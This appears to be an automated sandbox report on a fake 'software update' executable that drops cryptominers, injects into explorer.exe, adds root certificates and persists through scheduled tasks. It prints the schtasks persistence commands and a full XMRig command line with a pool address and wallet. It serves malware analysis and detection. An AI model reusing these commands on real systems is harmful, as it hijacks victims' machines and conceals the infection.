Analysis
  max time kernel: 150s
  max time network: 152s
  platform: windows7_x64
  resource: win7v20210408
  submitted: 18-07-2021 23:59

Static task: static1
Behavioral task: behavioral1
  Sample: Software updated v2.6.0.exe
  Resource: win7v20210408
General
  Target: Software updated v2.6.0.exe
  Size: 256KB
  MD5: 18d05e20731583a22b495d0d1f107c5b
  SHA1: 2ced0e3577063ca3613b43661e7df5bc1411ab09
  SHA256: b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
  SHA512: 36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a
Malware Config
Signatures

XMRig Miner Payload (3 IoCs)
  resource                                                                      yara_rule
  behavioral1/memory/1256-119-0x0000000140000000-0x0000000140758000-memory.dmp  xmrig
  behavioral1/memory/1256-120-0x00000001402EB66C-mapping.dmp                    xmrig
  behavioral1/memory/1256-122-0x0000000140000000-0x0000000140758000-memory.dmp  xmrig

Executes dropped EXE (6 IoCs)
  pid   process
  1320  xmrmine.exe
  1128  etcmin.exe
  1744  rtksmbs.exe
  1940  serverpatch.exe
  2008  sihost32.exe
  1004  sihost64.exe

Loads dropped DLL (6 IoCs)
  pid   process
  1820  Software updated v2.6.0.exe
  1820  Software updated v2.6.0.exe
  1128  etcmin.exe
  1320  xmrmine.exe
  1744  rtksmbs.exe
  1940  serverpatch.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Suspicious use of SetThreadContext (1 IoCs)
  description                          pid   process          target process
  PID 1940 set thread context of 1256  1940  serverpatch.exe  explorer.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 4 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   process
  1460  schtasks.exe
  780   schtasks.exe
  512   schtasks.exe
  812   schtasks.exe

Modifies system certificate store
  process          description       ioc
  rtksmbs.exe      Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25
  rtksmbs.exe      Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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
  rtksmbs.exe      Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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
  rtksmbs.exe      Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob =
                                     190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a
  rtksmbs.exe      Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
  rtksmbs.exe      Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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
  serverpatch.exe  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
  serverpatch.exe  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid   process
  1128  etcmin.exe
  1320  xmrmine.exe
  1744  rtksmbs.exe
  1940  serverpatch.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description                   pid   process
  Token: SeDebugPrivilege       1128  etcmin.exe
  Token: SeDebugPrivilege       1320  xmrmine.exe
  Token: SeDebugPrivilege       1744  rtksmbs.exe
  Token: SeDebugPrivilege       1940  serverpatch.exe
  Token: SeLockMemoryPrivilege  1256  explorer.exe
  Token: SeLockMemoryPrivilege  1256  explorer.exe

Suspicious use of WriteProcessMemory (60 IoCs)
  pid   process                      ->  target pid  target process   (repeats)
  1820  Software updated v2.6.0.exe  ->  1320        xmrmine.exe      (x4)
  1820  Software updated v2.6.0.exe  ->  1128        etcmin.exe       (x4)
  1128  etcmin.exe                   ->  1060        cmd.exe          (x3)
  1320  xmrmine.exe                  ->  432         cmd.exe          (x3)
  1060  cmd.exe                      ->  1460        schtasks.exe     (x3)
  432   cmd.exe                      ->  780         schtasks.exe     (x3)
  1128  etcmin.exe                   ->  1744        rtksmbs.exe      (x3)
  1320  xmrmine.exe                  ->  1940        serverpatch.exe  (x3)
  1744  rtksmbs.exe                  ->  1200        cmd.exe          (x3)
  1200  cmd.exe                      ->  512         schtasks.exe     (x3)
  1744  rtksmbs.exe                  ->  2008        sihost32.exe     (x3)
  1940  serverpatch.exe              ->  1156        cmd.exe          (x3)
  1940  serverpatch.exe              ->  1004        sihost64.exe     (x3)
  1156  cmd.exe                      ->  812         schtasks.exe     (x3)
  1940  serverpatch.exe              ->  1256        explorer.exe     (x16)
Processes

C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Roaming\xmrmine.exe
    cmdline: C:\Users\Admin\AppData\Roaming\xmrmine.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\schtasks.exe
        cmdline: schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
        - Creates scheduled task(s)

    C:\Users\Admin\appdata\roaming\serverpatch.exe
      cmdline: "C:\Users\Admin\appdata\roaming\serverpatch.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Modifies system certificate store
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\schtasks.exe
          cmdline: schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
          - Creates scheduled task(s)

      C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
        cmdline: "C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
        - Executes dropped EXE

      C:\Windows\explorer.exe
        cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
        - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Roaming\etcmin.exe
    cmdline: C:\Users\Admin\AppData\Roaming\etcmin.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\schtasks.exe
        cmdline: schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
        - Creates scheduled task(s)

    C:\Users\Admin\appdata\roaming\rtksmbs.exe
      cmdline: "C:\Users\Admin\appdata\roaming\rtksmbs.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Modifies system certificate store
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\schtasks.exe
          cmdline: schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
          - Creates scheduled task(s)

      C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
        cmdline: "C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
        - Executes dropped EXE
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
  MD5: 2902de11e30dcc620b184e3bb0f0c1cb
  SHA1: 5d11d14a2558801a2688dc2d6dfad39ac294f222
  SHA256: e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544
  SHA512: efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E
  MD5: d474de575c39b2d39c8583c5c065498a
  SHA1: 5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25
  SHA256: 7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf
  SHA512: 7b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  MD5: 68f912b28b2ac15bb26deb4418630163
  SHA1: 3219940d8711fcc3cfb87384b9d9d2c241228421
  SHA256: 3abab11d81177160dfe7e69768ed0edcc4252e016b8819327a640e63dc8e7a06
  SHA512: b32ad169a06dc031b054c66ef402802ff8a5f670ab7d32453d4045f9efe68d80c313f1f3360ee3c039d3858b17dfd7e9415405ff442c5e0c66c626ed3c9a313b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E
  MD5: eff63d3f4d1231469f0797bf51e5bc10
  SHA1: c1e690217f17a8151a4a30bc18b8793730f945ce
  SHA256: 728ae83f52771f100e07d93da68b2a21f9aaa1bf634643ec1f596fcb98cb88c1
  SHA512: 8884da2b96bb26c6cdd436c8d45e29c2b0029389d7ee49a4dbdd0eedeb2b6f1da251c71e08bc95e6007969b3c7470ea2460a6177dc3e9635fb1ddda10056b9ca

C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
  MD5: f20a5085dbb85927b25ed46a45fe0a13
  SHA1: 41b351e45a7be1d6c6c6918ee65b00f5d69ff787
  SHA256: 370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
  SHA512: 4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
  MD5: e149663730c0b03c8936baffe9645bb4
  SHA1: c0fb146c35d48481df4149027953e4ab7be59e95
  SHA256: 33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
  SHA512: 553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

C:\Users\Admin\AppData\Roaming\etcmin.exe
  MD5: 406f2550d0d4b9b3e2f47994076e8b8b
  SHA1: 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
  SHA256: 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
  SHA512: 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

C:\Users\Admin\AppData\Roaming\rtksmbs.exe
  MD5: 406f2550d0d4b9b3e2f47994076e8b8b
  SHA1: 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
  SHA256: 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
  SHA512: 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

C:\Users\Admin\AppData\Roaming\serverpatch.exe
  MD5: 973037113a1f50e0ca79d3cc42a5ef66
  SHA1: 78235c164ebfa47d613a100abf5c64bed10c1036
  SHA256: a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
  SHA512: d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

C:\Users\Admin\AppData\Roaming\xmrmine.exe
  MD5: 973037113a1f50e0ca79d3cc42a5ef66
  SHA1: 78235c164ebfa47d613a100abf5c64bed10c1036
  SHA256: a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
  SHA512: d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
  MD5: f20a5085dbb85927b25ed46a45fe0a13
  SHA1: 41b351e45a7be1d6c6c6918ee65b00f5d69ff787
  SHA256: 370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
  SHA512: 4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
  MD5: e149663730c0b03c8936baffe9645bb4
  SHA1: c0fb146c35d48481df4149027953e4ab7be59e95
  SHA256: 33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
  SHA512: 553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

C:\Users\Admin\appdata\roaming\rtksmbs.exe
  MD5: 406f2550d0d4b9b3e2f47994076e8b8b
  SHA1: 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
  SHA256: 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
  SHA512: 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

C:\Users\Admin\appdata\roaming\serverpatch.exe
  MD5: 973037113a1f50e0ca79d3cc42a5ef66
  SHA1: 78235c164ebfa47d613a100abf5c64bed10c1036
  SHA256: a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
  SHA512: d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
  MD5: f20a5085dbb85927b25ed46a45fe0a13
  SHA1: 41b351e45a7be1d6c6c6918ee65b00f5d69ff787
  SHA256: 370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
  SHA512: 4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
  MD5: e149663730c0b03c8936baffe9645bb4
  SHA1: c0fb146c35d48481df4149027953e4ab7be59e95
  SHA256: 33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
  SHA512: 553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

\Users\Admin\AppData\Roaming\etcmin.exe
  MD5: 406f2550d0d4b9b3e2f47994076e8b8b
  SHA1: 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
  SHA256: 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
  SHA512: 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

\Users\Admin\AppData\Roaming\rtksmbs.exe
  MD5: 406f2550d0d4b9b3e2f47994076e8b8b
  SHA1: 01ab414c9d14ef6a10cd1f3c815e2d63ace18822
  SHA256: 4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
  SHA512: 73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

\Users\Admin\AppData\Roaming\serverpatch.exe
  MD5: 973037113a1f50e0ca79d3cc42a5ef66
  SHA1: 78235c164ebfa47d613a100abf5c64bed10c1036
  SHA256: a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
  SHA512: d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

\Users\Admin\AppData\Roaming\xmrmine.exe
  MD5: 973037113a1f50e0ca79d3cc42a5ef66
  SHA1: 78235c164ebfa47d613a100abf5c64bed10c1036
  SHA256: a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
  SHA512: d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

memory/432-76-0x0000000000000000-mapping.dmp
memory/512-96-0x0000000000000000-mapping.dmp
memory/780-80-0x0000000000000000-mapping.dmp
memory/812-107-0x0000000000000000-mapping.dmp
memory/1004-109-0x000000013F810000-0x000000013F811000-memory.dmp  (Filesize 4KB)
memory/1004-114-0x0000000002420000-0x0000000002422000-memory.dmp  (Filesize 8KB)
memory/1004-105-0x0000000000000000-mapping.dmp
memory/1060-75-0x0000000000000000-mapping.dmp
memory/1128-70-0x000000013F2A0000-0x000000013F2A1000-memory.dmp  (Filesize 4KB)
memory/1128-65-0x0000000000000000-mapping.dmp
memory/1128-73-0x00000000005D0000-0x00000000005D6000-memory.dmp  (Filesize 24KB)
memory/1128-78-0x000000001CA90000-0x000000001CA92000-memory.dmp  (Filesize 8KB)
memory/1156-102-0x0000000000000000-mapping.dmp
memory/1200-95-0x0000000000000000-mapping.dmp
memory/1256-119-0x0000000140000000-0x0000000140758000-memory.dmp  (Filesize 7.3MB)
memory/1256-122-0x0000000140000000-0x0000000140758000-memory.dmp  (Filesize 7.3MB)
memory/1256-121-0x0000000000070000-0x0000000000090000-memory.dmp  (Filesize 128KB)
memory/1256-123-0x00000000001C0000-0x00000000001E0000-memory.dmp  (Filesize 128KB)
memory/1256-124-0x00000000001C0000-0x00000000001E0000-memory.dmp  (Filesize 128KB)
memory/1256-120-0x00000001402EB66C-mapping.dmp
memory/1256-125-0x00000000001F0000-0x0000000000210000-memory.dmp  (Filesize 128KB)
memory/1320-79-0x000000001CA00000-0x000000001CA02000-memory.dmp  (Filesize 8KB)
memory/1320-62-0x0000000000000000-mapping.dmp
memory/1320-74-0x0000000000160000-0x0000000000169000-memory.dmp  (Filesize 36KB)
memory/1320-69-0x000000013F3A0000-0x000000013F3A1000-memory.dmp  (Filesize 4KB)
memory/1460-77-0x0000000000000000-mapping.dmp
memory/1744-82-0x0000000000000000-mapping.dmp
memory/1744-111-0x000000001B2F0000-0x000000001B2F2000-memory.dmp  (Filesize 8KB)
memory/1744-87-0x000000013FE80000-0x000000013FE81000-memory.dmp  (Filesize 4KB)
memory/1820-60-0x0000000076641000-0x0000000076643000-memory.dmp  (Filesize 8KB)
memory/1940-112-0x000000001CA10000-0x000000001CA12000-memory.dmp  (Filesize 8KB)
memory/1940-85-0x0000000000000000-mapping.dmp
memory/1940-91-0x000000013FB90000-0x000000013FB91000-memory.dmp  (Filesize 4KB)
memory/2008-113-0x000000001BE10000-0x000000001BE12000-memory.dmp  (Filesize 8KB)
memory/2008-98-0x0000000000000000-mapping.dmp
memory/2008-101-0x000000013FA10000-0x000000013FA11000-memory.dmp  (Filesize 4KB)